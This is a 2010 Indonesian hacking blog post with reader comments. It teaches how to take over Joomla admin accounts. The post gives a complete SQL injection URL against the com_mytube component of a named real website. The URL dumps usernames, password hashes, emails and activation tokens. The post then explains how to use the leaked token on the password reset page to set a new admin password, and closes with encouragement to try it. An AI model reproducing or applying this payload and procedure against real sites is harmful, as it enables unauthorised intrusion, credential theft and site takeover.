3.20.2010

Cracking Password Joomla

Ini adalah sebuah trik dengan memaksimalkan exploit dari component joomla yang vuln agar dapat masuk sebagai admin di situs berbasis cms joomla.
Mungkin kalian pernah bingung bagaimana cara crack hash joomla,, uda crack kesana kesini namun tidak mendapatkan hasil, berikut saya ada sedikit trik untuk mengakalinya. Yaitu dengan cara reset password dan memasukan token, token disini bukan tanda ' ya,, disini kita memaksimalkan exploit dari component joomla yang vuln.



misal anda menggunakan exploit com_mytube

http://www.malaysia-instinct.com/english/index.php?view=videos&type=member&user_id=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck

akan muncul username , password , email dan activation .
disini kita akan menggunakan email dan activation nya.
pertama buka halaman reset passwordnya dengan menambahkan index.php?option=com_user&view=reset

http://www.malaysia-instinct.com/english/index.php?option=com_user&view=reset

masukan email admin nyah...

setelah itu refresh halaman yang memunculkan username password dll ( http://www.malaysia-instinct.com/english/index.php?view=videos&type=member&user_id=0+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat%28username,0x3a,password,0x3a,email,0x3a,activation,0x3c62723e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--&option=com_mytube&Itemid=r3m1ck )

maka akan muncul activation atau tokennya...

kemudian balik ke halaman yang dimana kita disuruh memasukan token atau activation, masukan activation yang kita dapat dr hasil exploit td.

kemudian isi password baru...

login sebagai admin... selamat anda telah menjadi admin site tersebut...

sebagian sudah di patch agar tidak bisa reset, namun masih banyak yang bisa untuk di reset..selamat mencoba... happy hackin`....

use at your own risk....semoga bermanfaat...

--==[ r3m1ck ]==--
INDONESIANCODER

4 komentar:

  1. he..he.. Pertamax Cuy...i..i....
    akhirnya mendapat ilham dr sholat subuh ^^
    thx mas r3m1ck.... nice tut.

    regards,

    LOL1ds_IHT

    BalasHapus
  2. Sama2... semoga bermanfaat ^ ^

    BalasHapus
  3. nyari imel adminnya gimana bos...

    BalasHapus
  4. kk aku kok token nya vailid terus?

    BalasHapus

Silahkan tinggalkan komentar anda di sini...
makasih ya uda kasih komentar...
sering - sering maen sini ya...
No SaRa, No PoLiTiCs, No SPaMMiNG!!!